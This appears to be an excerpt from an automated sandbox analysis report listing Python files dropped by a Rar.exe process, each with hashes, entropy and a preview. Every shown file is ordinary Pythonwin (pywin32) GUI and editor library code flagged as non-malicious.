                                                                                                                                                                                                                                  SHA-512:1D0AB59FB5EE3159612FCB34265437CF77C8150EC71C2F3799ED1FAC687237BD466A8F1A300F89B1591E27E82323A51A339D8F196C4B25A9ADA8FA26BFB0AD10
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# No cancel button...import threading.import time..import win32api.import win32con.import win32ui.from pywin.mfc import dialog.from pywin.mfc.thread import WinThread...def MakeProgressDlgTemplate(caption, staticText=""):. style = (. win32con.DS_MODALFRAME. | win32con.WS_POPUP. | win32con.WS_VISIBLE. | win32con.WS_CAPTION. | win32con.WS_SYSMENU. | win32con.DS_SETFONT. ). cs = win32con.WS_CHILD | win32con.WS_VISIBLE.. w = 215. h = 36 # With button. h = 40.. dlg = [. [caption, (0, 0, w, h), style, None, (8, "MS Sans Serif")],. ].. s = win32con.WS_TABSTOP | cs.. dlg.append([130, staticText, 1000, (7, 7, w - 7, h - 32), cs | win32con.SS_LEFT]).. # dlg.append([128,. # .."Cancel",. # ..win32con.IDCANCEL,. # ..(w - 60, h - 18, 50, 14), s | win32con.BS_PUSHBUTTON]).. return dlg...class CStatusProgressDialog(dialog.Dialog):. def __init__(self, title, msg="", maxticks=100, tickincr=1):. sel
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23579
                                                                                                                                                                                                                                  Entropy (8bit):4.671711851438662
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:lvLO4nM1rrzHrSxQvUKv+iqsP3Om2Qcb27xDoBC8n:lvLXn68QvdqsP3OmyCc
                                                                                                                                                                                                                                  MD5:F98244F1F98BB85FCA32EE2182156A42
                                                                                                                                                                                                                                  SHA1:2B44F1FB726A9650F1A7296721A5D40541B42CB5
                                                                                                                                                                                                                                  SHA-256:42235CF86B787BB402515C767DBB59121DB817388DEBB97AF40FAE19962DE0E9
                                                                                                                                                                                                                                  SHA-512:AFF2509180B031EEA98DD88F0899BF254A5A4B3AB6C9C19CAB6590C3007BE57DEEF02B8412A6C10913B705357167883B978596B0136F3DC36C99418CB5EF1F74
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# DockingBar.py..# Ported directly (comments and all) from the samples at www.codeguru.com..# WARNING: Use at your own risk, as this interface is highly likely to change..# Currently we support only one child per DockingBar. Later we need to add.# support for multiple children...import struct..import win32api.import win32con.import win32ui.from pywin.mfc import afxres, window..clrBtnHilight = win32api.GetSysColor(win32con.COLOR_BTNHILIGHT).clrBtnShadow = win32api.GetSysColor(win32con.COLOR_BTNSHADOW)...def CenterPoint(rect):. width = rect[2] - rect[0]. height = rect[3] - rect[1]. return rect[0] + width // 2, rect[1] + height // 2...def OffsetRect(rect, point):. (x, y) = point. return rect[0] + x, rect[1] + y, rect[2] + x, rect[3] + y...def DeflateRect(rect, point):. (x, y) = point. return rect[0] + x, rect[1] + y, rect[2] - x, rect[3] - y...def PtInRect(rect, pt):. return rect[0] <= pt[0] < rect[2] and rect[1] <= pt[1] < rect[3]...class DockingBar(window.Wnd):.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16191
                                                                                                                                                                                                                                  Entropy (8bit):4.775924492405953
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:JNysLaI4QnYYoprzxlTRgiS/TeiMfwXYU8B8FFDqL6hiScShN+jduWnCSxMJYqIU:JIsLaTZEXYU8B8F9g6htbWnCBYqIG
                                                                                                                                                                                                                                  MD5:0B58622B03134430703357C9DCFB8143
                                                                                                                                                                                                                                  SHA1:ED939E49CE7D8D5925DC310F022878E21B4DB873
                                                                                                                                                                                                                                  SHA-256:844EE703077A5FA0FBBAD7C544AA19F5629E12033BD6A43CE22AE9B9F4E22CFE
                                                                                                                                                                                                                                  SHA-512:6F556DF3718F3B2ED767361B37B26F4F34FE9BBAD818FB6AD7937A6A1106F2A30CC99CD5F5CC97598EDC35C3FD9BF224204AADFA5062FD6E02818FA3C880843F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# App.py.# Application stuff..# The application is responsible for managing the main frame window..#.# We also grab the FileOpen command, to invoke our Python editor." The PythonWin application code. Manages most aspects of MDI, etc ".import os.import sys.import traceback..import regutil.import win32api.import win32con.import win32ui.from pywin.mfc import afxres, dialog, window.from pywin.mfc.thread import WinApp..from . import scriptutils..## NOTE: App and AppBuild should NOT be used - instead, you should contruct your.## APP class manually whenever you like (just ensure you leave these 2 params None!).## Whoever wants the generic "Application" should get it via win32iu.GetApp()..# These are "legacy".AppBuilder = None.App = None # default - if used, must end up a CApp derived class....# Helpers that should one day be removed!.def AddIdleHandler(handler):. print(. "app.AddIdleHandler is deprecated - please use win32ui.GetApp().AddIdleHandler() instead.". ). return win3
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5358
                                                                                                                                                                                                                                  Entropy (8bit):4.861124149859075
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:7Bn36/dTreIfMvipLRmt4plReR6MDfmDimiUmWiu+LmAnffbAWzvEFKTMVKMzkKj:FKBODuDNiPWr+LmAnffbA0vEFhwMvjJJ
                                                                                                                                                                                                                                  MD5:BE2C603FEF45B247DD96E6941230558C
                                                                                                                                                                                                                                  SHA1:739CE86445DA92C28DF4E5560AEE418ADF8C0740
                                                                                                                                                                                                                                  SHA-256:B7B3342709148684D7F7271FDF6BB3933E861F0AC07B1FECAADA56F31E76EEA4
                                                                                                                                                                                                                                  SHA-512:6A628FAAA0BE90D9161C4F3FB8075EC45BF614B93D2A428285F162E77C8FC2BA0EF07966A226E14113B72E31381D58D6D14D950A4B9D7F51941274D15FC4D4A8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os..import win32api.import win32con.import win32ui.from pywin.mfc import docview, window..from . import app..bStretch = 1...class BitmapDocument(docview.Document):. "A bitmap document. Holds the bitmap data itself.".. def __init__(self, template):. docview.Document.__init__(self, template). self.bitmap = None.. def OnNewDocument(self):. # I can not create new bitmaps.. win32ui.MessageBox("Bitmaps can not be created.").. def OnOpenDocument(self, filename):. self.bitmap = win32ui.CreateBitmap(). # init data members. f = open(filename, "rb"). try:. try:. self.bitmap.LoadBitmapFile(f). except IOError:. win32ui.MessageBox("Could not load the bitmap from %s" % filename). return 0. finally:. f.close(). self.size = self.bitmap.GetSize(). return 1.. def DeleteContents(self):. self.bitmap = None...class BitmapView
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1491
                                                                                                                                                                                                                                  Entropy (8bit):4.129546707116888
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:DNgb2k92Xxx4ducdIF/rkjxtdkhHQ708TKQVYt3oIc5QzEn2GNdyw6h9i:Bgb2k8XxGducdYI1tdgQg8ZVYZJ/n2km
                                                                                                                                                                                                                                  MD5:42E00F8E2EF55BED99382BFF1B75471A
                                                                                                                                                                                                                                  SHA1:39876B183894E49930AAE96A9F8588520591EACA
                                                                                                                                                                                                                                  SHA-256:0D18159CFA599E233E188FFF4C5FC907ED47B372FFCAC1628398F0E88D9E735C
                                                                                                                                                                                                                                  SHA-512:31BF1E78C025BF5E4BAD323464CFB0937DD6F09772D6BE3D1C1275DB210956A38AB15F29534DFC7C89DDAA0E9A7F13F66DB1D3FC1B1985D0993074B3F7CA90EE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# cmdline - command line utilities..import string.import sys..import win32ui...def ParseArgs(str):. import string.. ret = []. pos = 0. length = len(str). while pos < length:. try:. while str[pos] in string.whitespace:. pos = pos + 1. except IndexError:. break. if pos >= length:. break. if str[pos] == '"':. pos = pos + 1. try:. endPos = str.index('"', pos) - 1. nextPos = endPos + 2. except ValueError:. endPos = length. nextPos = endPos + 1. else:. endPos = pos. while endPos < length and not str[endPos] in string.whitespace:. endPos = endPos + 1. nextPos = endPos + 1. ret.append(str[pos : endPos + 1].strip()). pos = nextPos. return ret...def FixArgFileName(fileName):. """Convert a filename on the commandline to something useful..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6831
                                                                                                                                                                                                                                  Entropy (8bit):4.60734272249847
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:NUi+xH5OihJF9QLvIrG5Pl6BFZvg6XK6vd8mLlfRjTlOkZDLy08N8vFph8BZ/Ra0:NUi6vQmMP0tZ18uVlHH8WdL8b/RNXB
                                                                                                                                                                                                                                  MD5:C3DE464951525D4E0BB7A2432D996229
                                                                                                                                                                                                                                  SHA1:92F4F10AF324E3ECBEEC45BFEE83DF8A4BAB1C45
                                                                                                                                                                                                                                  SHA-256:8E92C21D7F8F48EB483FC04F4DA19E1980E88F5E5921CD91515C1978196B01A0
                                                                                                                                                                                                                                  SHA-512:8858A1B71D92F7A9BBC0389C8DF0A8E195513F24EBC400A9EB6A844172F1D5F34D0A0757ABC012C7F657777AD16A0A0360A53C49127009D90D0AFCAA0ED34D0B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Command Handlers for the debugger...# Not in the debugger package, as I always want these interfaces to be.# available, even if the debugger has not yet been (or can not be).# imported.import warnings..import win32ui.from pywin.scintilla.control import CScintillaEditInterface..from . import scriptutils..IdToBarNames = {. win32ui.IDC_DBG_STACK: ("Stack", 0),. win32ui.IDC_DBG_BREAKPOINTS: ("Breakpoints", 0),. win32ui.IDC_DBG_WATCH: ("Watch", 1),.}...class DebuggerCommandHandler:. def HookCommands(self):. commands = (. (self.OnStep, None, win32ui.IDC_DBG_STEP),. (self.OnStepOut, self.OnUpdateOnlyBreak, win32ui.IDC_DBG_STEPOUT),. (self.OnStepOver, None, win32ui.IDC_DBG_STEPOVER),. (self.OnGo, None, win32ui.IDC_DBG_GO),. (self.OnClose, self.OnUpdateClose, win32ui.IDC_DBG_CLOSE),. (self.OnAdd, self.OnUpdateAddBreakpoints, win32ui.IDC_DBG_ADD),. (self.OnClearAll, self.OnUpdateClearAllBreakpoints,
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2044
                                                                                                                                                                                                                                  Entropy (8bit):4.75480923449918
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:KU3pVVNXq5m1V+cm8mI3NqmtXWVh3mGvfhyMHnZZTOFwmLF:KU3pVVBq5+4cm8meqmtXjYfnyFwiF
                                                                                                                                                                                                                                  MD5:6A8C0BE282B0AEF1D76249DEABA9E980
                                                                                                                                                                                                                                  SHA1:864871CD5148A5D9BACAD2B45A3B0029AE4B3C66
                                                                                                                                                                                                                                  SHA-256:EE80DB72D088EF8E32B63E5284DEE6ABD7C142CDD2C6872B0B517A58672B6D7F
                                                                                                                                                                                                                                  SHA-512:1BFA636D9875F25A74A08396D5438E1448124DD6AFC49C120A76947836784E36BFA52B11FDDE515CCF0143158DB53C06C8D571FF8077153D21819981DFBF2890
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# dlgappcore..#.# base classes for dialog based apps....import win32api.import win32con.import win32ui.from pywin.mfc import dialog..from . import app..error = "Dialog Application Error"...class AppDialog(dialog.Dialog):. "The dialog box for the application".. def __init__(self, id, dll=None):. self.iconId = win32ui.IDR_MAINFRAME. dialog.Dialog.__init__(self, id, dll).. def OnInitDialog(self):. return dialog.Dialog.OnInitDialog(self).. # Provide support for a dlg app using an icon. def OnPaint(self):. if not self.IsIconic():. return self._obj_.OnPaint(). self.DefWindowProc(win32con.WM_ICONERASEBKGND, dc.GetHandleOutput(), 0). left, top, right, bottom = self.GetClientRect(). left = (right - win32api.GetSystemMetrics(win32con.SM_CXICON)) >> 1. top = (bottom - win32api.GetSystemMetrics(win32con.SM_CYICON)) >> 1. hIcon = win32ui.GetApp().LoadIcon(self.iconId). self.GetDC().DrawIcon((left, top),
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7057
                                                                                                                                                                                                                                  Entropy (8bit):4.439610719878647
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kF/En0TXzbOA4R/mmLC1Wt1iC1ZqwVZv2xF6cOXJvVS6WgRUScswk2:klEcXzbitmZw/KF6VjS6WRh
                                                                                                                                                                                                                                  MD5:454C66BD909952ADDBB5A65C57809517
                                                                                                                                                                                                                                  SHA1:AB58FD5D10B1BDDDF0E7B9F2FE1FF48A054C8771
                                                                                                                                                                                                                                  SHA-256:D04E3A0D0132A7E26D7AAF3314934ADBF2F9F56E9E29E25D201B5D302F658266
                                                                                                                                                                                                                                  SHA-512:E291E4C6D94A6959819F02F214A5FBF503BD39E4C1090A432AAD1B2EC865D2BD51633448E03C8421379023E8DF1BD9E16D4257135713AA2B139EE642AF94F35B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ModuleBrowser.py - A view that provides a module browser for an editor document..import pyclbr..import afxres.import commctrl.import pywin.framework.scriptutils.import pywin.mfc.docview.import win32api.import win32con.import win32ui.from pywin.tools import browser, hierlist...class HierListCLBRModule(hierlist.HierListItem):. def __init__(self, modName, clbrdata):. self.modName = modName. self.clbrdata = clbrdata.. def GetText(self):. return self.modName.. def GetSubList(self):. ret = []. for item in self.clbrdata.values():. if (. item.__class__ != pyclbr.Class. ): # ie, it is a pyclbr Function instance (only introduced post 1.5.2). ret.append(HierListCLBRFunction(item)). else:. ret.append(HierListCLBRClass(item)). ret.sort(). return ret.. def IsExpandable(self):. return 1...class HierListCLBRItem(hierlist.HierListItem):. def __init__(se
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2951
                                                                                                                                                                                                                                  Entropy (8bit):4.942933313190723
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:qBPlAgz+5ZK7c0v/7smwUxn6zDgxFEiJopf3ZAnKqMc:qAgzJ6UNDxO1pf3Z+f
                                                                                                                                                                                                                                  MD5:AA66EB26B463B110988121965DBCE948
                                                                                                                                                                                                                                  SHA1:2715FACC6E33390A8AB1D73AC10F42492419EFA7
                                                                                                                                                                                                                                  SHA-256:64390FDBF80467AB2C7A4E8BC3D3B2D80D6645FA215028D84EB9D518F09BDDEC
                                                                                                                                                                                                                                  SHA-512:6DE4FD8B77F86CE342D0EB335765BC6D89EF5DA8C335CD2A4065720D80B2E28910A9A04FF57FA26E4AADEF88BE6EB7327611E66394CEDFDB055E7D68AE3041A5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# __init__ for the Pythonwin editor package..#.# We used to support optional editors - eg, color or non-color..#.# This really isnt necessary with Scintilla, and scintilla.# is getting so deeply embedded that it was too much work...import sys..import win32con.import win32ui..defaultCharacterFormat = (-402653169, 0, 200, 0, 0, 0, 49, "Courier New")..##def GetDefaultEditorModuleName():.##.import pywin.##.# If someone has set pywin.editormodulename, then this is what we use.##.try:.##..prefModule = pywin.editormodulename.##.except AttributeError:.##..prefModule = win32ui.GetProfileVal("Editor","Module", "").##.return prefModule.##.##def WriteDefaultEditorModule(module):.##.try:.##..module = module.__name__.##.except:.##..pass.##.win32ui.WriteProfileVal("Editor", "Module", module)...def LoadDefaultEditor():. pass...##.prefModule = GetDefaultEditorModuleName().##.restorePrefModule = None.##.mod = None.##.if prefModule:.##..try:.##...mod = __import__(prefModule).##..except 'xx':.##...msg
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):25627
                                                                                                                                                                                                                                  Entropy (8bit):4.755414140494236
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:uze5N0VgInPYbtGLTtN3c3qUJF48Wi9FAWsCI0C4USCPuCbiPdeLDmPk8eLbxr8i:3PcP9qWiExI0Kk88bxrmbQ5gLM
                                                                                                                                                                                                                                  MD5:86D17F783F0F40790F86204C54AD2A71
                                                                                                                                                                                                                                  SHA1:CCBD0F896C3C68DF0E072E319F61BA1AB853054C
                                                                                                                                                                                                                                  SHA-256:FDE25DB1142ACF4D218A768A811A0CD4D0B52ECC3A1613E914F0D97E70A2554B
                                                                                                                                                                                                                                  SHA-512:AFC3E2C8E114B2D999DC35ECD06FBE37A368C6AC0D1E0717A5A7BFA6CA591269770C2184BF170392178C7268F32A038A07DA0408201FC7C7665132E3E06B0711
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Color Editor originally by Neil Hodgson, but restructured by mh to integrate.# even tighter into Pythonwin...import pywin.scintilla.keycodes.import win32api.import win32con.import win32ui.from pywin.framework.editor import (. GetEditorFontOption,. GetEditorOption,. SetEditorFontOption,. SetEditorOption,. defaultCharacterFormat,.).from pywin.scintilla import bindings..# from pywin.framework.editor import EditorPropertyPage..MSG_CHECK_EXTERNAL_FILE = (. win32con.WM_USER + 1999.) ## WARNING: Duplicated in document.py and editor.py..# Define a few common markers.MARKER_BOOKMARK = 0.MARKER_BREAKPOINT = 1.MARKER_CURRENT = 2..import pywin.scintilla.view.from pywin.debugger import dbgcon.from pywin.framework.editor.document import EditorDocumentBase.from pywin.scintilla import scintillacon # For the marker definitions.from pywin.scintilla.document import CScintillaDocument...class SyntEditDocument(EditorDocumentBase):. "A SyntEdit document.".. def OnDebuggerStateCha
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11603
                                                                                                                                                                                                                                  Entropy (8bit):4.979739602460823
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:jAwdGW/vgpdvJPbgwLJVwQ+aIRuUzCBLun:0ePg7LPhUV
                                                                                                                                                                                                                                  MD5:DAB3D0F83BCAACA8A0CA6A9C5FAAC11F
                                                                                                                                                                                                                                  SHA1:F4B5CEDC785B353D1666DFBA9C7AA4612694E478
                                                                                                                                                                                                                                  SHA-256:B43CF949918F7219CE1B58E53E416027E9F62BF1F480C69B1C65DC2C0DEB395F
                                                                                                                                                                                                                                  SHA-512:84BC325B67659409FF5485DBEBA99212CCF26CBE1C6308A51BB3B04165845D54B276058720236E6DD4DE93F1012AEE60AF49DE760173DD6C98965B3A52F9081D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import pywin.scintilla.config.import win32api.import win32con.import win32ui.from pywin.framework.editor import (. DeleteEditorOption,. GetEditorFontOption,. GetEditorOption,. SetEditorFontOption,. SetEditorOption,. defaultCharacterFormat,. editorTemplate,.).from pywin.mfc import dialog..from . import document..# The standard 16 color VGA palette should always be possible.paletteVGA = (. ("Black", 0, 0, 0),. ("Navy", 0, 0, 128),. ("Green", 0, 128, 0),. ("Cyan", 0, 128, 128),. ("Maroon", 128, 0, 0),. ("Purple", 128, 0, 128),. ("Olive", 128, 128, 0),. ("Gray", 128, 128, 128),. ("Silver", 192, 192, 192),. ("Blue", 0, 0, 255),. ("Lime", 0, 255, 0),. ("Aqua", 0, 255, 255),. ("Red", 255, 0, 0),. ("Fuchsia", 255, 0, 255),. ("Yellow", 255, 255, 0),. ("White", 255, 255, 255),.)...######################################################.#.# Property Page for editor options.#.class EditorPropertyPage(dialog.PropertyPage):. def
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14762
                                                                                                                                                                                                                                  Entropy (8bit):4.505299678067443
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:nqyDuI7alox51NGX/BZU0UV8w6a6tvte4H1SAmpo+QfnoPij:nqSelomnzUV8w6FGAoo+wnoKj
                                                                                                                                                                                                                                  MD5:E6508DD4684EA16A9987E983E189549D
                                                                                                                                                                                                                                  SHA1:20F8B1427713CEA8DA2FC25B2A76F5CDDC4EEBBF
                                                                                                                                                                                                                                  SHA-256:6348B90AA016AF071855E7C512E9A631AB0659F91BE3A2D737D6C54B5ABAC680
                                                                                                                                                                                                                                  SHA-512:EDE0B182E451EB6FC96466A4B4DB1EF12853C207662F2CB6765588AFE3BCE0E5B19FAE9D3E708AA7BD30EC329F46253D12943E55ADF948BA59193DD88EA467EC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# We no longer support the old, non-colour editor!..import os.import shutil.import traceback..import win32api.import win32con.import win32ui.from pywin.framework.editor import GetEditorOption.from pywin.mfc import docview, object..BAK_NONE = 0.BAK_DOT_BAK = 1.BAK_DOT_BAK_TEMP_DIR = 2.BAK_DOT_BAK_BAK_DIR = 3..MSG_CHECK_EXTERNAL_FILE = (. win32con.WM_USER + 1999.) ## WARNING: Duplicated in editor.py and coloreditor.py..import pywin.scintilla.document..ParentEditorDocument = pywin.scintilla.document.CScintillaDocument...class EditorDocumentBase(ParentEditorDocument):. def __init__(self, template):. self.bAutoReload = GetEditorOption("Auto Reload", 1). self.bDeclinedReload = 0 # Has the user declined to reload.. self.fileStat = None. self.bReportedFileNotFound = 0.. # what sort of bak file should I create.. # default to write to %temp%/bak/filename.ext. self.bakFileType = GetEditorOption("Backup Type", BAK_DOT_BAK_BAK_DIR).. s
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18241
                                                                                                                                                                                                                                  Entropy (8bit):4.679743271147803
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:GxM2a7TANZA/jdj7vql7INAU4m27dZ10Ny6pUcovM:r20/jdjk0F4nLc6M
                                                                                                                                                                                                                                  MD5:E90815BE95E40481C0662A2B431B3B70
                                                                                                                                                                                                                                  SHA1:9B282536957675F8983DFA15B5C4A8826BA990F5
                                                                                                                                                                                                                                  SHA-256:916A3ACBC2EB68D868EB759A8F84FA7FAD05FB027F0CB988C8449D77A42B6F15
                                                                                                                                                                                                                                  SHA-512:50A45101CE6052A210573BD7FE2318FCFDE8B131519684E5F8062F892DE30E38D9B283A222287D645F4F6D667A7C05F81AEB2D5523E0FF07902A9C6E7D3C1C88
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#####################################################################.#.# editor.py.#.# A general purpose text editor, built on top of the win32ui edit.# type, which is built on an MFC CEditView.#.#.# We now support reloading of externally modified documented.# (eg, presumably by some other process, such as source control or.# another editor..# We also suport auto-loading of externally modified files..# - if the current document has not been modified in this.# editor, but has been modified on disk, then the file.# can be automatically reloaded..#.# Note that it will _always_ prompt you if the file in the editor has been modified....import re..import regex.import win32api.import win32con.import win32ui.from pywin.framework.editor import (. GetEditorFontOption,. GetEditorOption,. SetEditorFontOption,. SetEditorOption,. defaultCharacterFormat,.).from pywin.mfc import afxres, dialog, docview..patImport = regex.symcomp("import \(<name>.*\)").patIndent = regex.compile("^\\([ \
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3148
                                                                                                                                                                                                                                  Entropy (8bit):4.627065154645439
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:ttRrHY/x7hqAmfVqVm9Je4ihNnfSns4Kwsh+aNe5SwxVX:1DY3kk5tnfWs4f3z
                                                                                                                                                                                                                                  MD5:A034E2B9E4870B7FADA5486BA9711DDE
                                                                                                                                                                                                                                  SHA1:B1B7A761FB80D86965A9E0F2592995369D316646
                                                                                                                                                                                                                                  SHA-256:961BC3585606E76DDA52639617BF5ABC83B7AF4A5C6829C0149E8DD156DD614A
                                                                                                                                                                                                                                  SHA-512:FA67A42CAAA4B1C2F8D9AE8C44467A02686959C08E4A4BD7E0E5B3F10E8343F507D0BB4C48F4CF90006CDD61E54D0D172FA3270CED828F9069EA51CF3DCB05B0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# frame.py - The MDI frame window for an editor..import pywin.framework.window.import win32con.import win32ui..from . import ModuleBrowser...class EditorFrame(pywin.framework.window.MDIChildWnd):. def OnCreateClient(self, cp, context):. # Create the default view as specified by the template (ie, the editor view). view = context.template.MakeView(context.doc). # Create the browser view.. browserView = ModuleBrowser.BrowserView(context.doc). view2 = context.template.MakeView(context.doc).. splitter = win32ui.CreateSplitter(). style = win32con.WS_CHILD | win32con.WS_VISIBLE. splitter.CreateStatic(self, 1, 2, style, win32ui.AFX_IDW_PANE_FIRST). sub_splitter = self.sub_splitter = win32ui.CreateSplitter(). sub_splitter.CreateStatic(splitter, 2, 1, style, win32ui.AFX_IDW_PANE_FIRST + 1).. # Note we must add the default view first, so that doc.GetFirstView() returns the editor view.. sub_splitter.CreateView(
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2060
                                                                                                                                                                                                                                  Entropy (8bit):4.687667955810207
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:iLW8jY3Qq49QDK4FZ+l094wHH72NGQBarLSB:iLWHQkKflC4wHb2NjaPSB
                                                                                                                                                                                                                                  MD5:A98ABD4CDBD03193D44E5F1378AB0565
                                                                                                                                                                                                                                  SHA1:22B45559E08CABBF13B6145B3D7CE59B5273249E
                                                                                                                                                                                                                                  SHA-256:BDBBE1B47268C858B5DB33129225966062B1ADBFA7678712A4211BF8CDD7DDF9
                                                                                                                                                                                                                                  SHA-512:366F6B8138845A620FE342E3535980C8F44A871CD9A5B0DC86F4D828F332D3DA09A3D5215DECEA26D932F31ADF725802A33548134E8CD9FC53E4CAF6AF1AE19E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os..import pywin.framework.window.import win32api.import win32ui.from pywin.mfc import docview..from . import frame..ParentEditorTemplate = docview.DocTemplate...class EditorTemplateBase(ParentEditorTemplate):. def __init__(. self, res=win32ui.IDR_TEXTTYPE, makeDoc=None, makeFrame=None, makeView=None. ):. if makeFrame is None:. makeFrame = frame.EditorFrame. ParentEditorTemplate.__init__(self, res, makeDoc, makeFrame, makeView).. def _CreateDocTemplate(self, resourceId):. assert 0, "You must override this".. def CreateWin32uiDocument(self):. assert 0, "You must override this".. def GetFileExtensions(self):. return ".txt", ".py".. def MatchDocType(self, fileName, fileType):. doc = self.FindOpenDocument(fileName). if doc:. return doc. ext = os.path.splitext(fileName)[1].lower(). if ext in self.GetFileExtensions():. return win32ui.CDocTemplate_Confidence_yesAttem
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3398
                                                                                                                                                                                                                                  Entropy (8bit):4.6330455844108895
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:ZLZA4QCHAr0bt4uG60UNmgr3E+ZezbPYcKPTGDLftwj8FtC:BZA4QL8t4nwxENQaC
                                                                                                                                                                                                                                  MD5:F5344413C1F70415897EEC86B0311BF0
                                                                                                                                                                                                                                  SHA1:D5A0B30A5D65EB96886B24259E81439FF235A0B0
                                                                                                                                                                                                                                  SHA-256:55FC7A2853787CFCA41A8FB4C8DA3F961844C0E56585BB82DD4DC7F8C9AE425F
                                                                                                                                                                                                                                  SHA-512:88891CE2D5D12B55ACA5F78BFB69D364733F8FFCDFA7CC17B34A806102431BDD2E1CC2A4B3DAA6D5628112C91A2A4B07CEED8DEEF46F88C621E8EAA7FE38E43F
                                                                                                                                                                                                                                  Malicious:false
